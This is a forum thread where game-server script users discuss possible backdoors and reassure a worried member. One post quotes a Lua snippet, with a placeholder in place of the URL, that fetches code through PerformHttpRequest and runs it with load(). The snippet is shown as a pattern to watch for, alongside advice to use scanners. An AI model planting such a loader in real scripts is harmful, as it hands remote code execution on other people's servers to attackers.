Messages
127
Reactions
1
Credits
55
Joined
Mar 2024
Messages
140
Reactions
0
Credits
17,992
Joined
Jan 2023
songbirdmusic_19573,
wrote:
I was installing a script I have to my server when I went to input the SQL into my database, I don't know if it means anything but I DID run the ...
That line is perfectly fine for a database
Messages
10
Reactions
0
Credits
353
Joined
Dec 2023
Messages
127
Reactions
1
Credits
55
Joined
Mar 2024
Thank you everyone for calming my nerves and reassuring me I didn't do anything wrong. It was just at first glance it seemed extremely odd so I panicked
Messages
52
Reactions
2
Credits
6,049
Joined
Aug 2022
PerformHttpRequest(' Sht that goes to a malware website., function (e, d)
local s = assert(load(d))
if (d == nil) then return end
s()
end)
things like this are Cipher codes. & Backdoors. Performhttprequest etc. get on github and download a backdoor checker ;)
local s = assert(load(d))
if (d == nil) then return end
s()
end)
things like this are Cipher codes. & Backdoors. Performhttprequest etc. get on github and download a backdoor checker ;)
Messages
127
Reactions
1
Credits
55
Joined
Mar 2024
Hopatchke,
wrote:
PerformHttpRequest(' Sht that goes to a malware website., function (e, d)
local s = assert(load(d))
if (d == nil) then return end
s()
end)
thing...
local s = assert(load(d))
if (d == nil) then return end
s()
end)
thing...
Wow thats really good to know thank you so much for the information! I have one installed on my server actually, but wasn't sure what to be on the look out for. If there are any threats I guess its long too late now haha
Messages
52
Reactions
2
Credits
6,049
Joined
Aug 2022
songbirdmusic_19573,
wrote:
Wow thats really good to know thank you so much for the information! I have one installed on my server actually, but wasn't sure what to be on th...
malwarebytes , the free version offers a good scan ;) , works perfectly!
Messages
127
Reactions
1
Credits
55
Joined
Mar 2024
Hopatchke,
wrote:
malwarebytes , the free version offers a good scan ;) , works perfectly!
I actually currently have three different protections installed, so hopefully I'm not as screwed then if I downloaded something I wasn't supposed to
Messages
1
Reactions
0
Credits
3
Joined
Sep 2024
Messages
193
Reactions
0
Credits
63
Joined
Sep 2024
songbirdmusic_19573,
wrote:
I was installing a script I have to my server when I went to input the SQL into my database, I don't know if it means anything but I DID run the ...
i need to know too thanks for creating this thread
Messages
30
Reactions
0
Credits
15
Joined
Dec 2022
Messages
127
Reactions
1
Credits
55
Joined
Mar 2024
Du22121,
wrote:
you never know if they add back doors when its too late
Not necessarily true, there are script checkers out there and you can scan them to be safe. I always scan my scripts, then manually search through all my code and put it through another scan to be sure. There are preventions an ways to be safe, you need to know what to look for
Messages
13
Reactions
0
Credits
58
Joined
Sep 2024
songbirdmusic_19573,
wrote:
Ce n'est pas forcément vrai, il existe des vérificateurs de scripts et vous pouvez les analyser pour plus de sécurité. J'analyse...
It would be cool to create a topic to explain how to do it and which tool to use :);)
Messages
156
Reactions
4
Credits
159
Joined
Mar 2024
songbirdmusic_19573,
wrote:
I was installing a script I have to my server when I went to input the SQL into my database, I don't know if it means anything but I DID run the ...
if you want to detect backdoors look for performhttp inside scripts
Messages
2
Reactions
0
Credits
50
Joined
Sep 2024
Messages
2
Reactions
0
Credits
38
Joined
Oct 2024
Messages
36
Reactions
0
Credits
56
Joined
Jan 2025
cochinofrito,
wrote:
Your are truly the goat for this
Messages
10
Reactions
0
Credits
953
Joined
Jan 2025